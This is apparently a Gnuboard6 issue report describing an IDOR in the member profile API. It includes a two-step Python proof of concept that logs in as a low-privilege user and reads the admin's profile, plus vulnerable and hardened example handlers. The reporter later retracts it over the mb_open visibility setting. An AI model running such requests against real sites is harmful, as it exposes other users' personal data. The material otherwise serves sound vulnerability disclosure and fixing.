## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This is an improper access control failure (CWE-284) that results in sensitive information disclosure (CWE-200). Strictly speaking it is a horizontal authorization failure (one member reading another member's record), not vertical privilege escalation: the requester learns the admin account's profile data but does not gain any admin capability.
## Step-by-Step Reproduction (PoC)
### 1. Register a regular (non-admin) member if none exists, then log in to obtain a JWT access token
```python
import requests

# Step 1: log in as an ordinary member and keep the JWT for step 2.
url = "http://localhost:8000/api/v1/token"
credentials = {
    "username": "test",  # mb_id of the low-privilege account
    "password": "1234",
}
# The token endpoint takes form-encoded fields, hence data= rather than json=.
res = requests.post(url, data=credentials)
if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")
    refresh_token = token_data.get("refresh_token")
    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] Login failed: {res.status_code}")
    print(res.text)
```
### 2. Use the regular member's token to read the admin profile
```python
import requests

access_token = "<access token from step 1>"
# Any mb_id can be substituted here; "admin" is the super administrator account.
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}",
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, the profile text and image paths, and the `mb_1`..`mb_10` extra fields (empty in the sample response above).
* Reflects **improper object-level access control**: the endpoint authenticates the caller but never checks whether that caller may view the requested `mb_id`.
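What the missing check looks like, as an added example that is not Gnuboard6's own code. It models the `/api/v1/members/{mb_id}` decision with an in-memory member table, placing the unchecked lookup from the report beside a hardened version. The field names (`mb_id`, `mb_nick`, `mb_email`, `mb_point`) come from the response above; `mb_level`, the admin threshold of 10, and the exact meaning of `mb_open` (the profile-visibility setting that the follow-up comment says the report did not account for) are assumptions for the example. The `probe` helper is an offline equivalent of step 2: it asks for every candidate `mb_id` as a low-privilege member and records which other members' emails come back.

```python
from dataclasses import dataclass


@dataclass
class Member:
    """Constructed member record; only the fields the example needs."""
    mb_id: str
    mb_nick: str
    mb_email: str
    mb_point: int
    mb_level: int  # assumption: 10 = super admin (classic Gnuboard convention)
    mb_open: bool  # profile visibility flag named in the follow-up comment


# Constructed sample table, not real data. "admin" keeps its profile closed.
MEMBERS = {
    "admin": Member("admin", "최고관리자", "admin@your-domain.com", 100, 10, False),
    "test": Member("test", "tester", "test@example.com", 0, 2, True),
    "alice": Member("alice", "alice", "alice@example.com", 5, 2, False),
}

PUBLIC_FIELDS = ("mb_id", "mb_nick", "mb_point")  # shown for an open profile
PRIVATE_FIELDS = ("mb_email",)                     # owner or admin only


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def _project(member: Member, fields) -> dict:
    return {name: getattr(member, name) for name in fields}


def is_admin(member: Member) -> bool:
    return member.mb_level >= 10  # assumption about the level scheme


def get_member_vulnerable(requester_id: str, target_id: str) -> dict:
    """The pattern the report describes: the caller is authenticated, but
    target_id is never compared against the caller, so every field of any
    member is returned."""
    target = MEMBERS.get(target_id)
    if target is None:
        raise NotFound(target_id)
    return _project(target, PUBLIC_FIELDS + PRIVATE_FIELDS)


def get_member_hardened(requester_id: str, target_id: str) -> dict:
    """Object-level authorization: owner and admins get the full record,
    other members get the public subset of an open profile, and closed or
    non-existent targets look identical to them so the endpoint cannot be
    used to enumerate valid mb_ids."""
    requester = MEMBERS.get(requester_id)
    if requester is None:
        raise Forbidden("unknown requester")
    target = MEMBERS.get(target_id)
    if requester_id == target_id or is_admin(requester):
        if target is None:
            raise NotFound(target_id)
        return _project(target, PUBLIC_FIELDS + PRIVATE_FIELDS)
    if target is None or not target.mb_open:
        raise Forbidden("profile not available")
    return _project(target, PUBLIC_FIELDS)


def outcome(handler, requester_id: str, target_id: str) -> str:
    """Collapse a handler call to 'ok', 'forbidden' or 'notfound'."""
    try:
        handler(requester_id, target_id)
    except Forbidden:
        return "forbidden"
    except NotFound:
        return "notfound"
    return "ok"


def probe(handler, requester_id: str, candidates) -> dict:
    """Offline equivalent of step 2: request each candidate mb_id as
    requester_id and record which other members' emails are disclosed."""
    leaked = {}
    for mb_id in candidates:
        if mb_id == requester_id:
            continue
        try:
            data = handler(requester_id, mb_id)
        except (Forbidden, NotFound):
            continue
        if "mb_email" in data:
            leaked[mb_id] = data["mb_email"]
    return leaked


if __name__ == "__main__":
    targets = ["admin", "alice", "ghost"]
    print("vulnerable:", probe(get_member_vulnerable, "test", targets))
    print("hardened:  ", probe(get_member_hardened, "test", targets))
```

Two points to check when verifying a fix of this kind: the public projection must never include contact fields even for an open profile, and a non-admin caller should get the same response for a closed profile and for an `mb_id` that does not exist, otherwise the endpoint still leaks which member ids are valid.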
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
1 comment
oxqnd
4 months ago
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
Board: Gnuboard6 Issues